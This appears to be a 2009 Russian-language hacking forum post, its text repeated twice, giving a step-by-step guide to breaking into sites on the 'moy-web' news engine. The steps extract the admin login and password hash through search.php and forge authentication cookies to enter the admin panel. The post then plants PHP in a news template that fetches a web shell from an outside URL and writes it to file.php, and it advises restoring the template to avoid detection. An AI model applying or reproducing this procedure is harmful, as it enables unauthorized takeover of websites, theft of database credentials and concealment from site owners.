Silence
17.06.2009, 18:56
1. Находим сайт на движке moy-web.
2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php
5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php
6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)
Устанавливаем Firefox ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) и плагин ([Ссылки могут видеть только зарегистрированные и активированные пользователи] firefox%2Faddon%2F573%2F) для него.
Дальше идем Инструменты=>Редактор Cookies=>Добавить
Заполняем:
1. Имя=>username
2. Содержимое=>Логин администратора (у меня root)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные и активированные пользователи] напр. [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру)
4. Путь=>Путь к админке (у меня /news/)
Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
1. Имя=>md5_password
2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные и активированные пользователи] напр. [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру)
4. Путь=>Путь к админке (у меня /news/)
Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))
Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта.
Заливаем шелл:
Настройкa блока новостей=>Редактировать шаблоны=>Активные новости
Удаляем от туда всё и вставляем следующее:
HTML;
$file = file_get_contents('[Ссылки могут видеть только зарегистрированные и активированные пользователи]');
$brd = fopen('file.php','w+');
$write = fwrite($brd, $file);
Сохранить…
Через пару минут наш файл загрузится.
Заходим .../news/file.php вводим логин-1 пароль-1
Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться.
2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php
5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php
6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)
Устанавливаем Firefox ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) и плагин ([Ссылки могут видеть только зарегистрированные и активированные пользователи] firefox%2Faddon%2F573%2F) для него.
Дальше идем Инструменты=>Редактор Cookies=>Добавить
Заполняем:
1. Имя=>username
2. Содержимое=>Логин администратора (у меня root)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные и активированные пользователи] напр. [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру)
4. Путь=>Путь к админке (у меня /news/)
Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
1. Имя=>md5_password
2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные и активированные пользователи] напр. [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру)
4. Путь=>Путь к админке (у меня /news/)
Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))
Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта.
Заливаем шелл:
Настройкa блока новостей=>Редактировать шаблоны=>Активные новости
Удаляем от туда всё и вставляем следующее:
HTML;
$file = file_get_contents('[Ссылки могут видеть только зарегистрированные и активированные пользователи]');
$brd = fopen('file.php','w+');
$write = fwrite($brd, $file);
Сохранить…
Через пару минут наш файл загрузится.
Заходим .../news/file.php вводим логин-1 пароль-1
Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться.